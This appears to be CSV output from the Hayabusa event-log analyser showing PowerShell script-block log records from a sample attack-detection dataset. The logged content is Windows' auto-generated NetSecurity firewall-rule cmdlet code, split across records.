[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } 
} } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletizatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 
'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 